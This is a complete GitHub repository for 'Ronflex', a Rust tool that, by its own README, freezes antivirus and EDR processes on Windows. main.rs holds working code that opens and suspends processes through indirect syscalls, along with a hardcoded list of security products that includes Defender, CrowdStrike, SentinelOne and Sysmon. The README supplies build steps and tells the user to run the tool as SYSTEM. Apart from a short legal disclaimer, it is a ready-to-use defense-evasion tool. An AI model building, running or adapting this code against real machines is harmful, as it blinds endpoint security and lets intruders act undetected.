├── .github └── workflows │ └── rust.yml ├── .gitignore ├── Cargo.lock ├── Cargo.toml ├── README.md ├── img └── ronflex_notepad.png └── src └── main.rs /.github/workflows/rust.yml: -------------------------------------------------------------------------------- 1 | name: Rust 2 | 3 | on: 4 | push: 5 | branches: [ "master" ] 6 | pull_request: 7 | branches: [ "master" ] 8 | 9 | env: 10 | CARGO_TERM_COLOR: always 11 | 12 | jobs: 13 | 14 | build-win: 15 | runs-on: windows-latest 16 | 17 | steps: 18 | - name: Checkout 19 | uses: actions/checkout@v3 20 | 21 | - name: Install latest rust toolchain 22 | uses: actions-rs/toolchain@v1 23 | with: 24 | toolchain: stable 25 | default: true 26 | override: true 27 | 28 | - name: Build 29 | run: cargo build --release --verbose 30 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | /target -------------------------------------------------------------------------------- /Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 3 | version = 3 4 | 5 | [[package]] 6 | name = "atty" 7 | version = "0.2.14" 8 | source = "registry+https://github.com/rust-lang/crates.io-index" 9 | checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" 10 | dependencies = [ 11 | "hermit-abi 0.1.19", 12 | "libc", 13 | "winapi", 14 | ] 15 | 16 | [[package]] 17 | name = "autocfg" 18 | version = "1.1.0" 19 | source = "registry+https://github.com/rust-lang/crates.io-index" 20 | checksum = "d468802bab17cbc0cc575e9b053f41e72aa36bfa6b7f55e3529ffa43161b97fa" 21 | 22 | [[package]] 23 | name = "cfg-if" 24 | version = "1.0.0" 25 | source = "registry+https://github.com/rust-lang/crates.io-index" 26 | checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" 27 | 28 | [[package]] 29 | name = "colored" 30 | version = "2.0.0" 31 | source = "registry+https://github.com/rust-lang/crates.io-index" 32 | checksum = "b3616f750b84d8f0de8a58bda93e08e2a81ad3f523089b05f1dffecab48c6cbd" 33 | dependencies = [ 34 | "atty", 35 | "lazy_static", 36 | "winapi", 37 | ] 38 | 39 | [[package]] 40 | name = "core-foundation-sys" 41 | version = "0.8.4" 42 | source = "registry+https://github.com/rust-lang/crates.io-index" 43 | checksum = "e496a50fda8aacccc86d7529e2c1e0892dbd0f898a6b5645b5561b89c3210efa" 44 | 45 | [[package]] 46 | name = "crossbeam-channel" 47 | version = "0.5.8" 48 | source = "registry+https://github.com/rust-lang/crates.io-index" 49 | checksum = "a33c2bf77f2df06183c3aa30d1e96c0695a313d4f9c453cc3762a6db39f99200" 50 | dependencies = [ 51 | "cfg-if", 52 | "crossbeam-utils", 53 | ] 54 | 55 | [[package]] 56 | name = "crossbeam-deque" 57 | version = "0.8.3" 58 | source = "registry+https://github.com/rust-lang/crates.io-index" 59 | checksum = "ce6fd6f855243022dcecf8702fef0c297d4338e226845fe067f6341ad9fa0cef" 60 | dependencies = [ 61 | "cfg-if", 62 | "crossbeam-epoch", 63 | "crossbeam-utils", 64 | ] 65 | 66 | [[package]] 67 | name = "crossbeam-epoch" 68 | version = "0.9.14" 69 | source = "registry+https://github.com/rust-lang/crates.io-index" 70 | checksum = "46bd5f3f85273295a9d14aedfb86f6aadbff6d8f5295c4a9edb08e819dcf5695" 71 | dependencies = [ 72 | "autocfg", 73 | "cfg-if", 74 | "crossbeam-utils", 75 | "memoffset", 76 | "scopeguard", 77 | ] 78 | 79 | [[package]] 80 | name = "crossbeam-utils" 81 | version = "0.8.15" 82 | source = "registry+https://github.com/rust-lang/crates.io-index" 83 | checksum = "3c063cd8cc95f5c377ed0d4b49a4b21f632396ff690e8470c29b3359b346984b" 84 | dependencies = [ 85 | "cfg-if", 86 | ] 87 | 88 | [[package]] 89 | name = "either" 90 | version = "1.8.1" 91 | source = "registry+https://github.com/rust-lang/crates.io-index" 92 | checksum = "7fcaabb2fef8c910e7f4c7ce9f67a1283a1715879a7c230ca9d6d1ae31f16d91" 93 | 94 | [[package]] 95 | name = "hermit-abi" 96 | version = "0.1.19" 97 | source = "registry+https://github.com/rust-lang/crates.io-index" 98 | checksum = "62b467343b94ba476dcb2500d242dadbb39557df889310ac77c5d99100aaac33" 99 | dependencies = [ 100 | "libc", 101 | ] 102 | 103 | [[package]] 104 | name = "hermit-abi" 105 | version = "0.2.6" 106 | source = "registry+https://github.com/rust-lang/crates.io-index" 107 | checksum = "ee512640fe35acbfb4bb779db6f0d80704c2cacfa2e39b601ef3e3f47d1ae4c7" 108 | dependencies = [ 109 | "libc", 110 | ] 111 | 112 | [[package]] 113 | name = "lazy_static" 114 | version = "1.4.0" 115 | source = "registry+https://github.com/rust-lang/crates.io-index" 116 | checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" 117 | 118 | [[package]] 119 | name = "libc" 120 | version = "0.2.141" 121 | source = "registry+https://github.com/rust-lang/crates.io-index" 122 | checksum = "3304a64d199bb964be99741b7a14d26972741915b3649639149b2479bb46f4b5" 123 | 124 | [[package]] 125 | name = "memoffset" 126 | version = "0.8.0" 127 | source = "registry+https://github.com/rust-lang/crates.io-index" 128 | checksum = "d61c719bcfbcf5d62b3a09efa6088de8c54bc0bfcd3ea7ae39fcc186108b8de1" 129 | dependencies = [ 130 | "autocfg", 131 | ] 132 | 133 | [[package]] 134 | name = "ntapi" 135 | version = "0.4.0" 136 | source = "registry+https://github.com/rust-lang/crates.io-index" 137 | checksum = "bc51db7b362b205941f71232e56c625156eb9a929f8cf74a428fd5bc094a4afc" 138 | dependencies = [ 139 | "winapi", 140 | ] 141 | 142 | [[package]] 143 | name = "num_cpus" 144 | version = "1.15.0" 145 | source = "registry+https://github.com/rust-lang/crates.io-index" 146 | checksum = "0fac9e2da13b5eb447a6ce3d392f23a29d8694bff781bf03a16cd9ac8697593b" 147 | dependencies = [ 148 | "hermit-abi 0.2.6", 149 | "libc", 150 | ] 151 | 152 | [[package]] 153 | name = "once_cell" 154 | version = "1.17.1" 155 | source = "registry+https://github.com/rust-lang/crates.io-index" 156 | checksum = "b7e5500299e16ebb147ae15a00a942af264cf3688f47923b8fc2cd5858f23ad3" 157 | 158 | [[package]] 159 | name = "rayon" 160 | version = "1.7.0" 161 | source = "registry+https://github.com/rust-lang/crates.io-index" 162 | checksum = "1d2df5196e37bcc87abebc0053e20787d73847bb33134a69841207dd0a47f03b" 163 | dependencies = [ 164 | "either", 165 | "rayon-core", 166 | ] 167 | 168 | [[package]] 169 | name = "rayon-core" 170 | version = "1.11.0" 171 | source = "registry+https://github.com/rust-lang/crates.io-index" 172 | checksum = "4b8f95bd6966f5c87776639160a66bd8ab9895d9d4ab01ddba9fc60661aebe8d" 173 | dependencies = [ 174 | "crossbeam-channel", 175 | "crossbeam-deque", 176 | "crossbeam-utils", 177 | "num_cpus", 178 | ] 179 | 180 | [[package]] 181 | name = "ronflex" 182 | version = "0.1.0" 183 | dependencies = [ 184 | "colored", 185 | "ntapi", 186 | "rust_syscalls", 187 | "sysinfo", 188 | "winapi", 189 | ] 190 | 191 | [[package]] 192 | name = "rust_syscalls" 193 | version = "0.1.0" 194 | source = "git+https://github.com/Nariod/rust_syscalls#162451aaf095c8cb8c5e6b33ebf0bf44c62aca34" 195 | dependencies = [ 196 | "ntapi", 197 | "winapi", 198 | ] 199 | 200 | [[package]] 201 | name = "scopeguard" 202 | version = "1.1.0" 203 | source = "registry+https://github.com/rust-lang/crates.io-index" 204 | checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" 205 | 206 | [[package]] 207 | name = "sysinfo" 208 | version = "0.28.4" 209 | source = "registry+https://github.com/rust-lang/crates.io-index" 210 | checksum = "b4c2f3ca6693feb29a89724516f016488e9aafc7f37264f898593ee4b942f31b" 211 | dependencies = [ 212 | "cfg-if", 213 | "core-foundation-sys", 214 | "libc", 215 | "ntapi", 216 | "once_cell", 217 | "rayon", 218 | "winapi", 219 | ] 220 | 221 | [[package]] 222 | name = "winapi" 223 | version = "0.3.9" 224 | source = "registry+https://github.com/rust-lang/crates.io-index" 225 | checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" 226 | dependencies = [ 227 | "winapi-i686-pc-windows-gnu", 228 | "winapi-x86_64-pc-windows-gnu", 229 | ] 230 | 231 | [[package]] 232 | name = "winapi-i686-pc-windows-gnu" 233 | version = "0.4.0" 234 | source = "registry+https://github.com/rust-lang/crates.io-index" 235 | checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" 236 | 237 | [[package]] 238 | name = "winapi-x86_64-pc-windows-gnu" 239 | version = "0.4.0" 240 | source = "registry+https://github.com/rust-lang/crates.io-index" 241 | checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" 242 | -------------------------------------------------------------------------------- /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "ronflex" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sysinfo = "0.28.4" 10 | colored = "2.0.0" 11 | winapi = "0.3.9" 12 | ntapi = "0.4.0" 13 | rust_syscalls = {git = "https://github.com/Nariod/rust_syscalls", features = ["_INDIRECT_"]} -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ronflex 2 | Attempts to suspend all known AV/EDRs processes on Windows using syscalls and the undocumented NtSuspendProcess API. Made with <3 for pentesters. Written in Rust. 3 | 4 | ## WARNING 5 | Ronflex tries to suspend all known AV/EDRs and other security product processes. There is a high chance that the system will be unstable after Ronflex did its thing ! Use at your own risks. 6 | 7 | ## Known limitations 8 | At the moment, Ronflex is not able to suspend processes protected by Anti-Malware Protected Process (AM-PPL), which is now quite common. WIP.. 9 | 10 | ## Todo 11 | - [x] Loop over known processes to suspend them 12 | - [x] Support for a specific process target 13 | - [x] Move the NtSuspendProcess and NtClose API calls to syscalls 14 | - [x] Move the remaining API calls to syscalls 15 | - [ ] Dynamically load the list of known processes from a file at compile time 16 | - [ ] Embbed a method to bypass AM-PPL. [PPLmedic](https://github.com/itm4n/PPLmedic) maybe ? 17 | 18 | # Quick start 19 | No time ? Let's make it short then. 20 | 21 | ## Binary 22 | In case of an emergency, you will find a ready to deploy x64 binary for Windows in the repo Release section. However, consider taking the time to compile it yourself. 23 | 24 | ## Cross-compile from Linux 25 | 26 | Install and configure Rust: 27 | - https://www.rust-lang.org/tools/install 28 | - `rustup target add x86_64-pc-windows-gnu` 29 | 30 | Build the binary: 31 | - `git clone https://github.com/Nariod/ronflex.git` 32 | - `cd ronflex` 33 | - `cargo build --release --target x86_64-pc-windows-gnu` 34 | 35 | ## Compile on Windows 36 | 37 | Install and configure Rust: 38 | - https://www.rust-lang.org/tools/install 39 | - `rustup target add x86_64-pc-windows-msvc` 40 | 41 | Build the binary: 42 | - `git clone https://github.com/Nariod/ronflex.git` 43 | - `cd ronflex` 44 | - `cargo build --release` 45 | 46 | ## Usage 47 | Run the binary with the highest privileges you can and without argument to freeze all known security products: 48 | - `ronflex.exe` 49 | 50 | Alternatively, you can freeze a specific target process by passing the exact process name: 51 | - `ronflex.exe notepad.exe` 52 | 53 | ![Notepad put to sleep](img/ronflex_notepad.png) 54 | 55 | # Usage and details 56 | WIP 57 | 58 | ## Credits 59 | - janoglezcampos for his [rust_syscalls](https://github.com/janoglezcampos/rust_syscalls) project 60 | - [The Sliver project](https://github.com/BishopFox/sliver) for the list of known AV/EDRs processes 61 | - Rust discord 62 | - StackOverflow 63 | 64 | ## Legal disclaimer 65 | Usage of anything presented in this repo to attack targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes. 66 | -------------------------------------------------------------------------------- /img/ronflex_notepad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nariod/ronflex/f979a2a4f6c36cbe5d377f33ea4f5279752f4d87/img/ronflex_notepad.png -------------------------------------------------------------------------------- /src/main.rs: -------------------------------------------------------------------------------- 1 | use colored::Colorize; 2 | use ntapi::ntapi_base::CLIENT_ID; 3 | use rust_syscalls::syscall; 4 | use std::env; 5 | use std::mem::size_of; 6 | use sysinfo::PidExt; 7 | use sysinfo::ProcessExt; 8 | use sysinfo::SystemExt; 9 | use winapi::shared::ntdef::{HANDLE, NTSTATUS, NULL, OBJECT_ATTRIBUTES}; 10 | use winapi::um::winnt::PROCESS_SUSPEND_RESUME; 11 | 12 | fn evil(target: &str) { 13 | let system = sysinfo::System::new_all(); 14 | 15 | for p in system.processes_by_exact_name(target) { 16 | println!("Targeting process: {} with PID: {}", p.name(), p.pid()); 17 | let pid: u32 = p.pid().as_u32(); 18 | 19 | let cid: CLIENT_ID = CLIENT_ID { 20 | UniqueProcess: pid as _, 21 | UniqueThread: 0 as _, 22 | }; 23 | 24 | let oa: OBJECT_ATTRIBUTES = OBJECT_ATTRIBUTES { 25 | Length: size_of::() as _, 26 | RootDirectory: NULL, 27 | ObjectName: NULL as _, 28 | Attributes: 0, 29 | SecurityDescriptor: NULL, 30 | SecurityQualityOfService: NULL, 31 | }; 32 | 33 | let mut handle: HANDLE = NULL; 34 | let mut ntstatus: NTSTATUS; 35 | 36 | unsafe { 37 | ntstatus = syscall!( 38 | "NtOpenProcess", 39 | &mut handle, 40 | PROCESS_SUSPEND_RESUME, 41 | &oa, 42 | &cid 43 | ); 44 | 45 | match ntstatus { 46 | 0 => {} 47 | _ => { 48 | let message = format!( 49 | "[-] Error accessing process: {} with PID: {}. NTSTATUS: {}. Skipping..", 50 | p.name(), 51 | p.pid(), 52 | ntstatus 53 | ) 54 | .red(); 55 | println!("{}", message); 56 | continue; 57 | } 58 | }; 59 | 60 | ntstatus = syscall!("NtSuspendProcess", handle); 61 | 62 | match ntstatus { 63 | 0 => { 64 | let message = format!("[+] Ronflex worked! Have a good night {}", &pid).green(); 65 | println!("{}", message); 66 | } 67 | _ => { 68 | let message = format!("[-] Ronflex failed.. NTSTATUS: {}", ntstatus).red(); 69 | println!("{}", message); 70 | } 71 | } 72 | 73 | let _ = syscall!("NtClose", handle); 74 | } 75 | } 76 | } 77 | 78 | fn main() { 79 | // product list source https://github.com/BishopFox/sliver/blob/041ae65c61629e65646623e472d658472022d84e/client/command/processes/ps.go 80 | let product_list: Vec<&str> = vec![ 81 | "ccSvcHst.exe", 82 | "cb.exe", 83 | "RepMgr.exe", 84 | "RepUtils.exe", 85 | "RepUx.exe", 86 | "RepWSC.exe", 87 | "scanhost.exe", 88 | "MsMpEng.exe", 89 | "SenseIR.exe", 90 | "SenseCncProxy.exe", 91 | "MsSense.exe", 92 | "MpCmdRun.exe", 93 | "MonitoringHost.exe", 94 | "HealthService.exe", 95 | "smartscreen.exe", 96 | "CSFalconService.exe", 97 | "CSFalconContainer.exe", 98 | "bdservicehost.exe", 99 | "bdagent.exe", 100 | "bdredline.exe", 101 | "coreServiceShell.exe", 102 | "ds_monitor.exe", 103 | "Notifier.exe", 104 | "dsa.exe", 105 | "ds_nuagent.exe", 106 | "coreFrameworkHost.exe", 107 | "SentinelServiceHost.exe", 108 | "SentinelStaticEngine.exe", 109 | "SentinelStaticEngineScanner.exe", 110 | "SentinelAgent.exe", 111 | "SentinelAgentWorker.exe", 112 | "SentinelHelperService.exe", 113 | "SentinelBrowserNativeHost.exe", 114 | "SentinelUI.exe", 115 | "Sysmon.exe", 116 | "Sysmon64.exe", 117 | "CylanceSvc.exe", 118 | "CylanceUI.exe", 119 | "TaniumClient.exe", 120 | "TaniumCX.exe", 121 | "TaniumDetectEngine.exe", 122 | ]; 123 | 124 | let args: Vec = env::args().collect(); 125 | 126 | println!("Run this tool as SYSTEM for maximum effect"); 127 | 128 | if args.len() == 2 { 129 | println!( 130 | "[+] Executing tool in custom target mode. Targeting {} process", 131 | &args[1] 132 | ); 133 | let target = &args[1]; 134 | evil(target); 135 | } else { 136 | println!("[+] Starting. Attempting to clean your system from nasty AV/EDR solutions.."); 137 | for target in product_list { 138 | evil(target); 139 | } 140 | } 141 | } 142 | --------------------------------------------------------------------------------